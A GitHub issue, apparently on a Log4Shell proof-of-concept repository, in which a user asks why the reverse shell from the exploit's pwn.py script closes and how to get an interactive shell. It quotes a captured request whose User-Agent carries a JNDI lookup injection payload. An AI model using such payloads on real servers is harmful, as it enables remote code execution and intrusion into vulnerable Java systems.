Skip to content

Reverse Shell keeps closing #6

@DennisFeldbusch

Description

@DennisFeldbusch

When I send a request with curl I get the same connection and output like the README tells, but it seems like I can't send commands. It just prints all I write and enter doesn't seem to send the commands to the server.

When I try it with the pwn.py script I get a connection from the server in my netcat like the following:

Connection from 192.168.178.80:55100
GET / HTTP/1.1
Host: 192.168.178.80:4040
User-Agent: ${jndi:ldap://127.0.0.1:8888/${java:version}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

but whenever I hit enter this connection closes.

How do I get a interactive shell?

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions